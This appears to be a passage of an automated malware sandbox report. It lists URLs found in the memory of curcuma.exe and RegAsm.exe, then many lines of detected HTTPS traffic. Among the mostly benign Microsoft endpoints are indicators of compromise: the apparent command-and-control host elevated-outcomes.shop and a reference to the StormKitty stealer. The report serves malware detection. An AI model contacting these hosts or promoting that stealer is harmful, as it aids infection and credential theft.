                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/assetss
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: curcuma.exe, 00000024.00000003.2075282516.000002428D619000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/&
                  Source: curcuma.exe, 00000024.00000002.2520369587.000002428EFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw
                  Source: curcuma.exe, 00000024.00000002.2520369587.000002428EFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw)
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2075282516.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049515469.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cN
                  Source: curcuma.exe, 00000024.00000003.2466209800.000002428D619000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/rueT
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/v
                  Source: curcuma.exe, 00000024.00000003.2100818963.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443
                  Source: curcuma.exe, 00000024.00000003.2050015519.000002428D5C8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2075282516.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV
                  Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ent-api.msn.com/%22
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11MSkH.img
                  Source: curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img
                  Source: curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1u24yb.imgt
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1xc9H0.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1xc9H0.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.imgt
                  Source: curcuma.exe, 00000024.00000003.2398313807.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.img
                  Source: curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.imgt
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.img
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.imgt
                  Source: curcuma.exe, 00000024.00000003.2404629202.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2404805159.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msKSh.img
                  Source: curcuma.exe, 00000024.00000003.2422328488.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1tU84U
                  Source: curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1tU84Ux-source-length:80205content-length:80205cache-con
                  Source: curcuma.exe, 00000024.00000003.2422328488.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msOZa
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Chart
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msn.com
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
                  Source: curcuma.exe, 00000024.00000003.2398313807.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459483437.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2444632892.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2433987605.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419214319.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2421271796.000002428F084000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2422225655.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459995322.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400479319.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2452794519.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2453381040.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402156077.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2440623982.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
                  Source: curcuma.exe, 00000024.00000003.2417754835.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
                  Source: curcuma.exe, 00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/a9
                  Source: curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2345352912.000002428F068000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2294930864.000002428F064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js
                  Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js#lang=en-us&ads
                  Source: curcuma.exe, 00000024.00000003.2294930864.000002428F064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/hi
                  Source: curcuma.exe, 00000024.00000003.2415670214.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to
                  Source: curcuma.exe, 00000024.00000003.2459483437.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2444632892.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2433987605.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2459995322.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2452794519.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2453381040.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2440623982.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
                  Source: curcuma.exe, 00000024.00000003.2319603939.000002428F065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pst-issuer.hcaptcha.com
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/r
                  Source: curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b2?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.
                  Source: curcuma.exe, 00000024.00000003.2385727598.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.m
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tp.msn.
                  Source: curcuma.exe, 00000024.00000003.2319603939.000002428F065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trusttoken.dev
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.clarity.ms
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: curcuma.exe, 00000024.00000003.2205440376.000002428F047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/har
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62114 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62137 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62120 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62066 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62086 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62100 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62184 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62155 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62190 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62057 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62131 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62139 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62185
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62141 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62068 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62125 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62119 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62144 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62055
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62057
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62098 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62111 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62190
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62189 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62067
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62068
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62189
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62069
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62099 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62185 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62085
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62086
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62179 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62153 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62130 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62073 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62113 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62138 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62107 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62142 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62085 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62124 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62112 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62106 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62115 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62140 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62182 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62069 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62101 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62143 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62055 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62146
